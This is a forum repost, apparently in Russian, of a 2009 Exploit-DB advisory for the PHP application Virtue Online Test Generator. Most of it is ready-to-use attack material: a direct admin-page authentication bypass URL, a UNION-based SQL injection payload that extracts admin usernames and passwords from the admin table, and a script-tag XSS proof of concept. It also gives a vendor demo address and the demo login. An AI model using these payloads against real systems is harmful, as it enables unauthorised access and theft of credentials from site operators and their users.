Exploit Virtue Online Test Generator - Authentication Bypass / SQL Injection / Cross-Site Scripting

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
9022
Проверка EDB
  1. Пройдено
Автор
HXH
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2009-2393 cve-2009-2392 cve-2009-2391
Дата публикации
2009-06-26
Код:
+===================================================================================+
|                                                                                   |
| Virtue Online Test Generator (AB/SQL/XSS) Multiple Remote Vulnerabilities         |
|                                                                                   |
+===================================================================================+
|                                                                                   |
| Author.: HxH                                                                      |
| Contact: HxH[at]live[dot]at                                                       |
|                                                                                   |
+===================================================================================+
|                                                                                   |
| Script.: Virtue Online Test Generator                                             |
| Home...: http://www.virtuenetz.com/virtue_test_generator.php                      |
|                                                                                   |
+-----------------------------------------------------------------------------------+
|                                                                                   |
| Exploit: After user login                                                         |
|                                                                                   |
| [+] Auth Bypass                                                                   |
|                                                                                   |
| http://[website]/[script]/admin/index.php                                         |
|                                                                                   |
| [+] SQLi                                                                          |
|                                                                                   |
| http://[website]/[script]/text.php?tid=[SQL]                                      |
|                                                                                   |
| [SQL]=null+union+select+1,2,concat(user_name,0x3a,user_pass)+from+admin--         |
|                                                                                   |
| [+] XSS                                                                           |
|                                                                                   |
| http://[website]/[script]/text.php?tid=<script>alert(1)</script>                  |
|                                                                                   |
+-----------------------------------------------------------------------------------+
|                                                                                   |
| Demo...: http://www.virtuenetz.com/exam                                           |
| Usrinfo: E-mail:[email protected] ~ Pass:demo                                   |
|                                                                                   |
+===================================================================================+
|                                                                                   |
| Greetz.: ~ Jiko ~ Sniper Code ~ T3rr0rist                                         |
|                                                                                   |
+===================================================================================+

# milw0rm.com [2009-06-26]
 
Источник
www.exploit-db.com

Похожие темы